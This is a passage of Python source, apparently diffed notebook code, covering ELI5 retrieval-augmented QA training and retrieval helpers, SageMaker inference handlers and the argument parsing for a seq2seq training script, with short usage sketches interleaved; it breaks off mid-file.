+ iterators = [iter(dloader) for dloader in data_loaders]
180
+ joint_iter = zip(*iterators)
181
+ loc_steps = 0
182
+ loc_loss = 0.0
183
+ st_time = time()
184
+ for (step, (batches,)) in enumerate(zip(joint_iter)):
185
+ for batch in batches:
186
+ (q_ids, q_mask, a_ids, a_mask) = batch
187
+ loss = model(q_ids, q_mask, a_ids, a_mask, checkpoint_batch_size=args.checkpoint_batch_size)
188
+ loss.backward()
189
+ optimizer.step()
190
+ scheduler.step()
191
+ model.zero_grad()
192
+ loc_loss += loss.item()
193
+ loc_steps += 1
194
+ if step % args.print_freq == 0:
195
+ print('{:2d} {:5d} of {:5d} \t L: {:.3f} \t -- {:.3f}'.format(e, step, len(dataset_list[0]) // args.batch_size, loc_loss / loc_steps, time() - st_time))
196
+ loc_loss = 0
197
+ loc_steps = 0
198
+
199
+ def evaluate_qa_retriever(model, dataset, tokenizer, args):
200
+ model.eval()
201
+ eval_sampler = SequentialSampler(dataset)
202
+ model_collate_fn = functools.partial(make_qa_retriever_batch, tokenizer=tokenizer, max_len=args.max_length, device='cuda:0')
203
+ data_loader = DataLoader(dataset, batch_size=args.batch_size, sampler=eval_sampler, collate_fn=model_collate_fn)
204
+ epoch_iterator = tqdm(data_loader, desc='Iteration', disable=True)
205
+ tot_loss = 0.0
206
+ with torch.no_grad():
207
+ for (step, batch) in enumerate(epoch_iterator):
208
+ (q_ids, q_mask, a_ids, a_mask) = batch
209
+ loss = model(q_ids, q_mask, a_ids, a_mask)
210
+ tot_loss += loss.item()
211
+ return tot_loss / (step + 1)
212
+
213
+ def train_qa_retriever(qar_model, qar_tokenizer, qar_train_dset, qar_valid_dset, qar_args):
214
+ qar_optimizer = AdamW(qar_model.parameters(), lr=qar_args.learning_rate, eps=1e-08)
215
+ qar_scheduler = get_linear_schedule_with_warmup(qar_optimizer, num_warmup_steps=100, num_training_steps=(qar_args.num_epochs + 1) * math.ceil(len(qar_train_dset) / qar_args.batch_size))
216
+ for e in range(qar_args.num_epochs):
217
+ train_qa_retriever_epoch(qar_model, qar_train_dset, qar_tokenizer, qar_optimizer, qar_scheduler, qar_args, e)
218
+ m_save_dict = {'model': qar_model.state_dict(), 'optimizer': qar_optimizer.state_dict(), 'scheduler': qar_scheduler.state_dict()}
219
+ print('Saving model {}'.format(qar_args.model_save_name))
220
+ torch.save(m_save_dict, '{}_{}.pth'.format(qar_args.model_save_name, e))
221
+ eval_loss = evaluate_qa_retriever(qar_model, qar_valid_dset, qar_tokenizer, qar_args)
222
+ print('Evaluation loss epoch {:4d}: {:.3f}'.format(e, eval_loss))
223
+
224
+ class ELI5DatasetS2S(Dataset):
225
+
226
+ def __init__(self, examples_array, make_doc_fun=None, extra_answer_threshold=3, document_cache=None, training=True):
227
+ self.training = training
228
+ self.data = examples_array
229
+ self.make_doc_function = make_doc_fun
230
+ self.document_cache = {} if document_cache is None else document_cache
231
+ assert not (make_doc_fun is None and document_cache is None)
232
+ if self.training:
233
+ self.qa_id_list = [(i, j) for (i, qa) in enumerate(self.data) for (j, (a, sc)) in enumerate(zip(qa['answers']['text'], qa['answers']['score'])) if j == 0 or sc >= extra_answer_threshold]
234
+ else:
235
+ self.qa_id_list = [(i, 0) for i in range(self.data.num_rows)]
236
+
237
+ def __len__(self):
238
+ return len(self.qa_id_list)
239
+
240
+ def make_example(self, idx):
241
+ (i, j) = self.qa_id_list[idx]
242
+ example = self.data[i]
243
+ question = example['title'] + ' ' + example['selftext']
244
+ answer = example['answers']['text'][j]
245
+ q_id = example['q_id']
246
+ if self.make_doc_function is not None:
247
+ self.document_cache[q_id] = self.document_cache.get(q_id, self.make_doc_function(example['title']))
248
+ document = self.document_cache[q_id]
249
+ in_st = 'question: {} context: {}'.format(question.lower().replace(' --t--', '').strip(), document.lower().strip())
250
+ out_st = answer
251
+ return (in_st, out_st)
252
+
253
+ def __getitem__(self, idx):
254
+ return self.make_example(idx)
255
+
256
+ def make_qa_s2s_model(model_name='facebook/bart-large', from_file=None, device='cuda:0'):
257
+ tokenizer = AutoTokenizer.from_pretrained(model_name)
258
+ model = AutoModelForSeq2SeqLM.from_pretrained(model_name).to(device)
259
+ if from_file is not None:
260
+ param_dict = torch.load(from_file)
261
+ model.load_state_dict(param_dict['model'])
262
+ return (tokenizer, model)
263
+
264
+ def make_qa_s2s_batch(qa_list, tokenizer, max_len=64, max_a_len=360, device='cuda:0'):
265
+ q_ls = [q for (q, a) in qa_list]
266
+ a_ls = [a for (q, a) in qa_list]
267
+ q_toks = tokenizer.batch_encode_plus(q_ls, max_length=max_len, pad_to_max_length=True)
268
+ (q_ids, q_mask) = (torch.LongTensor(q_toks['input_ids']).to(device), torch.LongTensor(q_toks['attention_mask']).to(device))
269
+ a_toks = tokenizer.batch_encode_plus(a_ls, max_length=min(max_len, max_a_len), pad_to_max_length=True)
270
+ (a_ids, a_mask) = (torch.LongTensor(a_toks['input_ids']).to(device), torch.LongTensor(a_toks['attention_mask']).to(device))
271
+ lm_labels = a_ids[:, 1:].contiguous().clone()
272
+ lm_labels[a_mask[:, 1:].contiguous() == 0] = -100
273
+ model_inputs = {'input_ids': q_ids, 'attention_mask': q_mask, 'decoder_input_ids': a_ids[:, :-1].contiguous(), 'lm_labels': lm_labels}
274
+ return model_inputs
275
+
276
+ def train_qa_s2s_epoch(model, dataset, tokenizer, optimizer, scheduler, args, e=0, curriculum=False):
277
+ model.train()
278
+ if curriculum:
279
+ train_sampler = SequentialSampler(dataset)
280
+ else:
281
+ train_sampler = RandomSampler(dataset)
282
+ model_collate_fn = functools.partial(make_qa_s2s_batch, tokenizer=tokenizer, max_len=args.max_length, device='cuda:0')
283
+ data_loader = DataLoader(dataset, batch_size=args.batch_size, sampler=train_sampler, collate_fn=model_collate_fn)
284
+ epoch_iterator = tqdm(data_loader, desc='Iteration', disable=True)
285
+ loc_steps = 0
286
+ loc_loss = 0.0
287
+ st_time = time()
288
+ for (step, batch_inputs) in enumerate(epoch_iterator):
289
+ pre_loss = model(**batch_inputs)[0]
290
+ loss = pre_loss.sum() / pre_loss.shape[0]
291
+ loss.backward()
292
+ if step % args.backward_freq == 0:
293
+ optimizer.step()
294
+ scheduler.step()
295
+ model.zero_grad()
296
+ loc_loss += loss.item()
297
+ loc_steps += 1
298
+ if step % args.print_freq == 0 or step == 1:
299
+ print('{:2d} {:5d} of {:5d} \t L: {:.3f} \t -- {:.3f}'.format(e, step, len(dataset) // args.batch_size, loc_loss / loc_steps, time() - st_time))
300
+ loc_loss = 0
301
+ loc_steps = 0
302
+
303
+ def eval_qa_s2s_epoch(model, dataset, tokenizer, args):
304
+ model.eval()
305
+ train_sampler = SequentialSampler(dataset)
306
+ model_collate_fn = functools.partial(make_qa_s2s_batch, tokenizer=tokenizer, max_len=args.max_length, device='cuda:0')
307
+ data_loader = DataLoader(dataset, batch_size=args.batch_size, sampler=train_sampler, collate_fn=model_collate_fn)
308
+ epoch_iterator = tqdm(data_loader, desc='Iteration', disable=True)
309
+ loc_steps = 0
310
+ loc_loss = 0.0
311
+ st_time = time()
312
+ with torch.no_grad():
313
+ for (step, batch_inputs) in enumerate(epoch_iterator):
314
+ pre_loss = model(**batch_inputs)[0]
315
+ loss = pre_loss.sum() / pre_loss.shape[0]
316
+ loc_loss += loss.item()
317
+ loc_steps += 1
318
+ if step % args.print_freq == 0:
319
+ print('{:5d} of {:5d} \t L: {:.3f} \t -- {:.3f}'.format(step, len(dataset) // args.batch_size, loc_loss / loc_steps, time() - st_time))
320
+ print('Total \t L: {:.3f} \t -- {:.3f}'.format(loc_loss / loc_steps, time() - st_time))
321
+
322
+ def train_qa_s2s(qa_s2s_model, qa_s2s_tokenizer, s2s_train_dset, s2s_valid_dset, s2s_args):
323
+ s2s_optimizer = AdamW(qa_s2s_model.parameters(), lr=s2s_args.learning_rate, eps=1e-08)
324
+ s2s_scheduler = get_linear_schedule_with_warmup(s2s_optimizer, num_warmup_steps=400, num_training_steps=(s2s_args.num_epochs + 1) * math.ceil(len(s2s_train_dset) / s2s_args.batch_size))
325
+ for e in range(s2s_args.num_epochs):
326
+ train_qa_s2s_epoch(qa_s2s_model, s2s_train_dset, qa_s2s_tokenizer, s2s_optimizer, s2s_scheduler, s2s_args, e, curriculum=e == 0)
327
+ m_save_dict = {'model': qa_s2s_model.state_dict(), 'optimizer': s2s_optimizer.state_dict(), 'scheduler': s2s_scheduler.state_dict()}
328
+ print('Saving model {}'.format(s2s_args.model_save_name))
329
+ eval_qa_s2s_epoch(qa_s2s_model, s2s_valid_dset, qa_s2s_tokenizer, s2s_args)
330
+ torch.save(m_save_dict, '{}_{}.pth'.format(s2s_args.model_save_name, e))
331
+
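As a rough illustration of how these helpers fit together, the sketch below builds a hypothetical argument namespace with the fields the training functions read and kicks off fine-tuning. The BART checkpoint, hyperparameter values, and toy dataset are illustrative only; note also that the helpers rely on the older transformers API (`lm_labels`, `pad_to_max_length`), so a transformers version contemporary with the original notebook is assumed.

# Hypothetical usage sketch -- checkpoint, hyperparameters and data are placeholders.
import argparse
from transformers import AutoTokenizer, AutoModelForSeq2SeqLM

s2s_args = argparse.Namespace(
    batch_size=8,            # read by train_qa_s2s_epoch / eval_qa_s2s_epoch
    backward_freq=16,        # optimizer step interval (gradient accumulation)
    max_length=1024,         # question + support document input length
    print_freq=100,          # logging interval
    learning_rate=2e-4,
    num_epochs=3,
    model_save_name='seq2seq_models/eli5_bart_model',
)
qa_s2s_tokenizer = AutoTokenizer.from_pretrained('facebook/bart-large')
qa_s2s_model = AutoModelForSeq2SeqLM.from_pretrained('facebook/bart-large').to('cuda:0')
# The training functions only need (question_doc, answer) string pairs with a length.
s2s_train_dset = [('question: why is the sky blue? context: <P> Rayleigh scattering ...',
                   'Because shorter wavelengths scatter more strongly ...')] * 64
s2s_valid_dset = s2s_train_dset[:8]
train_qa_s2s(qa_s2s_model, qa_s2s_tokenizer, s2s_train_dset, s2s_valid_dset, s2s_args)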
332
+ def qa_s2s_generate(question_doc, qa_s2s_model, qa_s2s_tokenizer, num_answers=1, num_beams=None, min_len=64, max_len=256, do_sample=False, temp=1.0, top_p=None, top_k=None, max_input_length=512, device='cuda:0'):
333
+ model_inputs = make_qa_s2s_batch([(question_doc, 'A')], qa_s2s_tokenizer, max_input_length, device=device)
334
+ n_beams = num_answers if num_beams is None else max(num_beams, num_answers)
335
+ generated_ids = qa_s2s_model.generate(input_ids=model_inputs['input_ids'], attention_mask=model_inputs['attention_mask'], min_length=min_len, max_length=max_len, do_sample=do_sample, early_stopping=True, num_beams=1 if do_sample else n_beams, temperature=temp, top_k=top_k, top_p=top_p, eos_token_id=qa_s2s_tokenizer.eos_token_id, no_repeat_ngram_size=3, num_return_sequences=num_answers, decoder_start_token_id=qa_s2s_tokenizer.bos_token_id)
336
+ return [qa_s2s_tokenizer.decode(ans_ids, skip_special_tokens=True).strip() for ans_ids in generated_ids]
337
+
338
+ def embed_passages_for_retrieval(passages, tokenizer, qa_embedder, max_length=128, device='cuda:0'):
339
+ a_toks = tokenizer.batch_encode_plus(passages, max_length=max_length, pad_to_max_length=True)
340
+ (a_ids, a_mask) = (torch.LongTensor(a_toks['input_ids']).to(device), torch.LongTensor(a_toks['attention_mask']).to(device))
341
+ with torch.no_grad():
342
+ a_reps = qa_embedder.embed_answers(a_ids, a_mask).cpu().type(torch.float)
343
+ return a_reps.numpy()
344
+
345
+ def embed_questions_for_retrieval(q_ls, tokenizer, qa_embedder, device='cuda:0'):
346
+ q_toks = tokenizer.batch_encode_plus(q_ls, max_length=128, pad_to_max_length=True)
347
+ (q_ids, q_mask) = (torch.LongTensor(q_toks['input_ids']).to(device), torch.LongTensor(q_toks['attention_mask']).to(device))
348
+ with torch.no_grad():
349
+ q_reps = qa_embedder.embed_questions(q_ids, q_mask).cpu().type(torch.float)
350
+ return q_reps.numpy()
351
+
352
+ def make_qa_dense_index(qa_embedder, tokenizer, passages_dset, batch_size=512, max_length=128, index_name='kilt_passages_reps.dat', dtype='float32', device='cuda:0'):
353
+ st_time = time()
354
+ fp = np.memmap(index_name, dtype=dtype, mode='w+', shape=(passages_dset.num_rows, 128))
355
+ n_batches = math.ceil(passages_dset.num_rows / batch_size)
356
+ for i in range(n_batches):
357
+ passages = [p for p in passages_dset[i * batch_size:(i + 1) * batch_size]['passage_text']]
358
+ reps = embed_passages_for_retrieval(passages, tokenizer, qa_embedder, max_length, device)
359
+ fp[i * batch_size:(i + 1) * batch_size] = reps
360
+ if i % 50 == 0:
361
+ print(i, time() - st_time)
362
+
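The query helpers further down expect a `wiki_index` object exposing a FAISS-style `search` method. A minimal sketch of turning the memmapped passage representations written above into such an index might look like this (assuming the `faiss` package and the same 128-dimensional float32 layout used by `make_qa_dense_index`):

# Sketch only: load the passage embeddings and index them with FAISS.
import faiss
import numpy as np

passage_reps = np.memmap('kilt_passages_reps.dat', dtype='float32', mode='r',
                         shape=(passages_dset.num_rows, 128))
wiki_index = faiss.IndexFlatIP(128)                     # inner-product index over 128-d embeddings
wiki_index.add(np.ascontiguousarray(passage_reps))      # add all passage vectors at once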
363
+ def evaluate_retriever(qa_list, retriever_func, scoring_func, n_ret=10, verbose=False):
364
+ total_retriever_time = 0.0
365
+ total_retriever_score = 0.0
366
+ st_time = time()
367
+ for (i, (question, answer)) in enumerate(qa_list):
368
+ r_time = time()
369
+ retrieved_passages = retriever_func(question, n_ret)
370
+ total_retriever_time += time() - r_time
371
+ total_retriever_score += scoring_func(retrieved_passages, answer)
372
+ if verbose and ((i + 1) % 500 == 0 or i <= 1):
373
+ print('{:03d}: S-{:.4f} T-{:.4f} | {:.2f}'.format(i + 1, total_retriever_score / (i + 1), total_retriever_time / (i + 1), time() - st_time))
374
+ return {'idf_recall': total_retriever_score / (i + 1), 'retrieval_time': total_retriever_time / (i + 1)}
375
+
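`evaluate_retriever` only assumes two callables: `retriever_func(question, n_ret)` returning a list of passage dicts, and `scoring_func(retrieved_passages, answer)` returning a number. A hypothetical pairing, reusing the dense query helper defined below and a crude token-overlap score (a stand-in, not the notebook's IDF recall), could look like:

# Illustrative callbacks for evaluate_retriever; names and scoring are assumptions.
def dense_retriever(question, n_ret):
    _, passages = query_qa_dense_index(question, qa_embedder, tokenizer,
                                       wiki_passages, wiki_index, n_results=n_ret)
    return passages

def token_overlap_score(retrieved_passages, answer):
    answer_tokens = set(answer.lower().split())
    retrieved_tokens = set(' '.join(p['passage_text'] for p in retrieved_passages).lower().split())
    return len(answer_tokens & retrieved_tokens) / max(len(answer_tokens), 1)

# qa_valid_pairs: a list of (question, answer) string pairs.
scores = evaluate_retriever(qa_valid_pairs, dense_retriever, token_overlap_score, n_ret=10, verbose=True)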
376
+ def query_qa_dense_index(question, qa_embedder, tokenizer, wiki_passages, wiki_index, n_results=10, min_length=20, device='cuda:0'):
377
+ q_rep = embed_questions_for_retrieval([question], tokenizer, qa_embedder, device=device)
378
+ (D, I) = wiki_index.search(q_rep, 2 * n_results)
379
+ res_passages = [wiki_passages[int(i)] for i in I[0]]
380
+ support_doc = '<P> ' + ' <P> '.join([p['passage_text'] for p in res_passages])
381
+ res_list = [dict([(k, p[k]) for k in wiki_passages.column_names]) for p in res_passages]
382
+ res_list = [res for res in res_list if len(res['passage_text'].split()) > min_length][:n_results]
383
+ for (r, sc) in zip(res_list, D[0]):
384
+ r['score'] = float(sc)
385
+ return (support_doc, res_list)
386
+
387
+ def batch_query_qa_dense_index(questions, qa_embedder, tokenizer, wiki_passages, wiki_index, n_results=10):
388
+ q_rep = embed_questions_for_retrieval(questions, tokenizer, qa_embedder)
389
+ (D, I) = wiki_index.search(q_rep, n_results)
390
+ res_passages_lst = [[wiki_passages[int(i)] for i in i_lst] for i_lst in I]
391
+ support_doc_lst = ['<P> ' + ' <P> '.join([p['passage_text'] for p in res_passages]) for res_passages in res_passages_lst]
392
+ all_res_lists = []
393
+ for (res_passages, dl) in zip(res_passages_lst, D):
394
+ res_list = [dict([(k, p[k]) for k in wiki_passages.column_names]) for p in res_passages]
395
+ for (r, sc) in zip(res_list, dl):
396
+ r['score'] = float(sc)
397
+ all_res_lists += [res_list[:]]
398
+ return (support_doc_lst, all_res_lists)
399
+
400
+ def query_qa_dense_index_nn(passage, qa_embedder, tokenizer, wiki_passages, wiki_index, n_results=10, min_length=20):
401
+ a_rep = embed_passages_for_retrieval([passage], tokenizer, qa_embedder)
402
+ (D, I) = wiki_index.search(a_rep, 2 * n_results)
403
+ res_passages = [wiki_passages[int(i)] for i in I[0]]
404
+ support_doc = '<P> ' + ' <P> '.join([p['passage_text'] for p in res_passages])
405
+ res_list = [dict([(k, p[k]) for k in wiki_passages.column_names]) for p in res_passages]
406
+ res_list = [res for res in res_list if len(res['passage_text'].split()) > min_length][:n_results]
407
+ for (r, sc, i) in zip(res_list, D[0], I[0]):
408
+ r['passage_id'] = int(i)
409
+ r['score'] = float(sc)
410
+ return (support_doc, res_list)
411
+
412
+ def batch_query_qa_dense_index_nn(passages, qa_embedder, tokenizer, wiki_passages, wiki_index, n_results=10):
413
+ a_reps = embed_passages_for_retrieval(passages, tokenizer, qa_embedder)
414
+ (D, I) = wiki_index.search(a_reps, n_results)
415
+ res_passages_lst = [[wiki_passages[int(i)] for i in i_lst] for i_lst in I]
416
+ support_doc_lst = ['<P> ' + ' <P> '.join([p['passage_text'] for p in res_passages]) for res_passages in res_passages_lst]
417
+ all_res_lists = []
418
+ for (res_passages, dl, il) in zip(res_passages_lst, D, I):
419
+ res_list = [dict([(k, p[k]) for k in wiki_passages.column_names]) for p in res_passages]
420
+ for (r, sc, i) in zip(res_list, dl, il):
421
+ r['passage_id'] = int(i)
422
+ r['score'] = float(sc)
423
+ all_res_lists += [res_list[:]]
424
+ return (support_doc_lst, all_res_lists)
425
+
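Tying the retrieval and generation halves together, a hypothetical end-to-end query could look like the following; the `question: ... context: ...` prompt format and all object names are assumptions carried over from the function signatures above.

# Sketch: retrieve a support document, then condition the seq2seq model on it.
question = 'Why does the sky look blue during the day?'
support_doc, retrieved = query_qa_dense_index(
    question, qa_embedder, tokenizer, wiki_passages, wiki_index, n_results=10
)
question_doc = 'question: {} context: {}'.format(question, support_doc)
answers = qa_s2s_generate(
    question_doc, qa_s2s_model, qa_s2s_tokenizer,
    num_answers=1, num_beams=8, min_len=64, max_len=256, max_input_length=1024,
)
print(answers[0])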
426
+ # File: notebooks-main/sagemaker/17_custom_inference_script/code/inference.py
427
+ from transformers import AutoTokenizer, AutoModel
428
+ import torch
429
+ import torch.nn.functional as F
430
+
431
+ def mean_pooling(model_output, attention_mask):
432
+ token_embeddings = model_output[0]
433
+ input_mask_expanded = attention_mask.unsqueeze(-1).expand(token_embeddings.size()).float()
434
+ return torch.sum(token_embeddings * input_mask_expanded, 1) / torch.clamp(input_mask_expanded.sum(1), min=1e-09)
435
+
436
+ def model_fn(model_dir):
437
+ tokenizer = AutoTokenizer.from_pretrained(model_dir)
438
+ model = AutoModel.from_pretrained(model_dir)
439
+ return (model, tokenizer)
440
+
441
+ def predict_fn(data, model_and_tokenizer):
442
+ (model, tokenizer) = model_and_tokenizer
443
+ sentences = data.pop('inputs', data)
444
+ encoded_input = tokenizer(sentences, padding=True, truncation=True, return_tensors='pt')
445
+ with torch.no_grad():
446
+ model_output = model(**encoded_input)
447
+ sentence_embeddings = mean_pooling(model_output, encoded_input['attention_mask'])
448
+ sentence_embeddings = F.normalize(sentence_embeddings, p=2, dim=1)
449
+ return {'vectors': sentence_embeddings}
450
+
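Outside of SageMaker, the two handler functions above can be exercised directly; the sketch below substitutes a sentence-transformers checkpoint id for the extracted `model_dir` (an assumption, not part of the original handler) and mirrors the `{'inputs': ...}` payload the endpoint would receive.

# Local smoke test for the custom handlers above (model id is illustrative).
model_and_tokenizer = model_fn('sentence-transformers/all-MiniLM-L6-v2')
result = predict_fn({'inputs': ['This is a sentence.', 'Each sentence becomes one vector.']},
                    model_and_tokenizer)
print(result['vectors'].shape)   # e.g. torch.Size([2, 384]) for this checkpoint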
451
+ # File: notebooks-main/sagemaker/18_inferentia_inference/code/inference.py
452
+ import os
453
+ from transformers import AutoConfig, AutoTokenizer
454
+ import torch
455
+ import torch.neuron
456
+ os.environ['NEURON_RT_NUM_CORES'] = '1'
457
+ AWS_NEURON_TRACED_WEIGHTS_NAME = 'neuron_model.pt'
458
+
459
+ def model_fn(model_dir):
460
+ tokenizer = AutoTokenizer.from_pretrained(model_dir)
461
+ model = torch.jit.load(os.path.join(model_dir, AWS_NEURON_TRACED_WEIGHTS_NAME))
462
+ model_config = AutoConfig.from_pretrained(model_dir)
463
+ return (model, tokenizer, model_config)
464
+
465
+ def predict_fn(data, model_tokenizer_model_config):
466
+ (model, tokenizer, model_config) = model_tokenizer_model_config
467
+ inputs = data.pop('inputs', data)
468
+ embeddings = tokenizer(inputs, return_tensors='pt', max_length=model_config.traced_sequence_length, padding='max_length', truncation=True)
469
+ neuron_inputs = tuple(embeddings.values())
470
+ with torch.no_grad():
471
+ predictions = model(*neuron_inputs)[0]
472
+ scores = torch.nn.Softmax(dim=1)(predictions)
473
+ return [{'label': model_config.id2label[item.argmax().item()], 'score': item.max().item()} for item in scores]
474
+
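For reference, a request to this handler carries a single JSON payload and the handler returns one label/score pair per classified input; the values below are invented purely to show the shape of the exchange.

# Illustrative request/response shape for the Inferentia handler above.
request_payload = {'inputs': 'I love using the new Inference DLC.'}
# predict_fn(request_payload, (model, tokenizer, model_config)) would return something like:
example_response = [{'label': 'POSITIVE', 'score': 0.99}]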
475
+ # File: notebooks-main/sagemaker/22_accelerate_sagemaker_examples/src/seq2seq/run_seq2seq_no_trainer.py
476
+ """"""
477
+ import argparse
478
+ import json
479
+ import logging
480
+ import math
481
+ import os
482
+ import random
483
+ from pathlib import Path
484
+ from time import time
485
+ import datasets
486
+ import nltk
487
+ import numpy as np
488
+ import torch
489
+ from datasets import load_dataset, load_metric
490
+ from torch.utils.data import DataLoader
491
+ from tqdm.auto import tqdm
492
+ import transformers
493
+ from accelerate import Accelerator
494
+ from accelerate.logging import get_logger
495
+ from accelerate.utils import DummyOptim, DummyScheduler, set_seed
496
+ from filelock import FileLock
497
+ from huggingface_hub import Repository
498
+ from transformers import CONFIG_MAPPING, MODEL_MAPPING, AutoConfig, AutoModelForSeq2SeqLM, AutoTokenizer, DataCollatorForSeq2Seq, SchedulerType, get_scheduler
499
+ from transformers.utils import get_full_repo_name, is_offline_mode
500
+ from transformers.utils.versions import require_version
501
+ logger = get_logger(__name__)
502
+ require_version('datasets>=1.8.0', 'To fix: pip install -r examples/pytorch/summarization/requirements.txt')
503
+ MODEL_CONFIG_CLASSES = list(MODEL_MAPPING.keys())
504
+ MODEL_TYPES = tuple((conf.model_type for conf in MODEL_CONFIG_CLASSES))
505
+ try:
506
+ nltk.data.find('tokenizers/punkt')
507
+ except (LookupError, OSError):
508
+ if is_offline_mode():
509
+ raise LookupError('Offline mode: run this script without TRANSFORMERS_OFFLINE first to download nltk data files')
510
+ with FileLock('.lock') as lock:
511
+ nltk.download('punkt', quiet=True)
512
+
513
+ def parse_args():
514
+ parser = argparse.ArgumentParser(description='Finetune a transformers model on a summarization task')
515
+ parser.add_argument('--dataset_name', type=str, default=None, help='The name of the dataset to use (via the datasets library).')
516
+ parser.add_argument('--dataset_config_name', type=str, default=None, help='The configuration name of the dataset to use (via the datasets library).')
517
+ parser.add_argument('--train_file', type=str, default=None, help='A csv or a json file containing the training data.')
518
+ parser.add_argument('--validation_file', type=str, default=None, help='A csv or a json file containing the validation data.')
519
+ parser.add_argument('--ignore_pad_token_for_loss', type=bool, default=True, help='Whether to ignore the tokens corresponding to padded labels in the loss computation or not.')
520
+ parser.add_argument('--max_source_length', type=int, default=1024, help='The maximum total input sequence length after tokenization. Sequences longer than this will be truncated, sequences shorter will be padded.')
521
+ parser.add_argument('--source_prefix', type=str, default=None, help='A prefix to add before every source text (useful for T5 models).')
522
+ parser.add_argument('--preprocessing_num_workers', type=int, default=None, help='The number of processes to use for the preprocessing.')
523
+ parser.add_argument('--overwrite_cache', type=bool, default=None, help='Overwrite the cached training and evaluation sets')
524
+ parser.add_argument('--max_target_length', type=int, default=128, help='The maximum total sequence length for target text after tokenization. Sequences longer than this will be truncated, sequences shorter will be padded.')
525
+ parser.add_argument('--val_max_target_length', type=int, default=None, help='The maximum total sequence length for validation target text after tokenization. Sequences longer than this will be truncated, sequences shorter will be padded. Will default to `max_target_length`. This argument is also used to override the ``max_length`` param of ``model.generate``, which is used during ``evaluate`` and ``predict``.')
526
+ parser.add_argument('--val_min_target_length', type=int, default=10, help='The minimum total sequence length for validation target text after tokenization. This argument is also used to override the ``min_length`` param of ``model.generate``, which is used during ``evaluate`` and ``predict``.')
527
+ parser.add_argument('--n_train', type=int, default=2000, help='Number of training examples to use. If None, all training examples will be used.')
528
+ parser.add_argument('--n_val', type=int, default=500, help='Number of validation examples to use. If None, all validation examples will be used.')
529
+ parser.add_argument('--n_val_batch_generations', type=int, default=5, help='Number of validation batches for which sample generations are printed during evaluation.')
530
+ parser.add_argument('--max_length', type=int, default=128, help='The maximum total input sequence length after tokenization. Sequences longer than this will be truncated, sequences shorter will be padded if `--pad_to_max_length` is passed.')
531
+ parser.add_argument('--num_beams', type=int, default=None, help='Number of beams to use for evaluation. This argument will be passed to ``model.generate``, which is used during ``evaluate`` and ``predict``.')
532
+ parser.add_argument('--pad_to_max_length', type=bool, default=False, help='If passed, pad all samples to `max_length`. Otherwise, dynamic padding is used.')
533
+ parser.add_argument('--model_name_or_path', type=str, help='Path to pretrained model or model identifier from huggingface.co/models.', required=False)
534
+ parser.add_argument('--config_name', type=str, default=None, help='Pretrained config name or path if not the same as model_name')
535
+ parser.add_argument('--tokenizer_name', type=str, default=None, help='Pretrained tokenizer name or path if not the same as model_name')
536
+ parser.add_argument('--text_column', type=str, default=None, help='The name of the column in the datasets containing the full texts (for summarization).')
537
+ parser.add_argument('--summary_column', type=str, default=None, help='The name of the column in the datasets containing the summaries (for summarization).')
538
+ parser.add_argument('--use_slow_tokenizer', type=bool, default=False, help='If passed, will use a slow tokenizer (not backed by the 🤗 Tokenizers library).')
539
+ parser.add_argument('--per_device_train_batch_size', type=int, default=8, help='Batch size (per device) for the training dataloader.')
540
+ parser.add_argument('--per_device_eval_batch_size', type=int, default=8, help='Batch size (per device) for the evaluation dataloader.')
541
+ parser.add_argument('--learning_rate', type=float, default=5e-05, help='Initial learning rate (after the potential warmup period) to use.')
542
+ parser.add_argument('--weight_decay', type=float, default=0.0, help='Weight decay to use.')
543
+ parser.add_argument('--num_train_epochs', type=int, default=3, help='Total number of training epochs to perform.')
544
+ parser.add_argument('--max_train_steps', type=int, default=None, help='Total number of training steps to perform. If provided, overrides num_train_epochs.')
545
+ parser.add_argument('--gradient_accumulation_steps', type=int, default=1, help='Number of updates steps to accumulate before performing a backward/update pass.')
546
+ parser.add_argument('--lr_scheduler_type', type=SchedulerType, default='linear', help='The scheduler type to use.', choices=['linear', 'cosine', 'cosine_with_restarts', 'polynomial', 'constant', 'constant_with_warmup'])
547
+ parser.add_argument('--num_warmup_steps', type=int, default=0, help='Number of steps for the warmup in the lr scheduler.')
548
+ parser.add_argument('--output_dir', type=str, default=None, help='Where to store the final model.')
549
+ parser.add_argument('--seed', type=int, default=None, help='A seed for reproducible training.')
550
+ parser.add_argument('--model_type', type=str, default=None, help='Model type to use if training from scratch.', choices=MODEL_TYPES)
551
+ parser.add_argument('--push_to_hub', type=bool, default=False, help='Whether or not to push the model to the Hub.')
552
+ parser.add_argument('--hub_model_id', type=str, help='The name of the repository to keep in sync with the local `output_dir`.')
553
+ parser.add_argument('--hub_token', type=str, help='The token to use to push to the Model Hub.')
554
+ parser.add_argument('--checkpointing_steps', type=str, default=None, help="Whether the various states should be saved at the end of every n steps, or 'epoch' for each epoch.")
555
+ parser.add_argument('--resume_from_checkpoint', type=str, default=None, help='If the training should continue from a checkpoint folder.')
556
+ parser.add_argument('--load_best_model', type=bool, default=False, help='Whether to load the best model at the end of training')
557
+ parser.add_argument('--logging_steps', type=int, default=None, help='log every n steps')
558
+ parser.add_argument('--with_tracking', type=bool, default=False, help='Whether to enable experiment trackers for logging.')
559
+ parser.add_argument('--report_to', type=str, default='all', help='The integration to report the results and logs to. Supported platforms are `"tensorboard"`, `"wandb"` and `"comet_ml"`. Use `"all"` (default) to report to all integrations. Only applicable when `--with_tracking` is passed.')
560
+ parser.add_argument('--report_name', type=str, default='chatbot_no_trainer', help='The name of the experiment tracking folder. Only applicable when `--with_tracking` is passed.')
561
+ args = parser.parse_args()
562
+ if args.dataset_name is None and args.train_file is None and (args.validation_file is None):
563
+ raise ValueError('Need either a dataset name or a training/validation file.')
564
+ else:
565
+ if args.train_file is not None:
566
+ extension = args.train_file.split('.')[-1]
567
+ assert extension in ['csv', 'json'], '`train_file` should be a csv or a json file.'
568
+ if args.validation_file is not None:
569
+ extension = args.validation_file.split('.')[-1]
570
+ assert extension in ['csv', 'json'], '`validation_file` should be a csv or a json file.'
571
+ if args.push_to_hub:
572
+ assert args.output_dir is not None, 'Need an `output_dir` to create a repo when `--push_to_hub` is passed.'
573
+ return args
574
+
575
+ def checkpoint_model(checkpoint_folder, ckpt_id, model, epoch, last_global_step, **kwargs):
576
+ checkpoint_state_dict = {'epoch': epoch, 'last_global_step': last_global_step}
577
+ checkpoint_state_dict.update(kwargs)
578
+ success = model.save_checkpoint(checkpoint_folder, ckpt_id, checkpoint_state_dict)
579
+ status_msg = f'checkpointing: checkpoint_folder={checkpoint_folder}, ckpt_id={ckpt_id}'
580
+ if success:
581
+ logging.info(f'Success {status_msg}')
582
+ else:
583
+ logging.warning(f'Failure {status_msg}')
584
+ return
585
+
586
+ def evaluate(args, model, metric, tokenizer, eval_dataloader, accelerator, max_length):
587
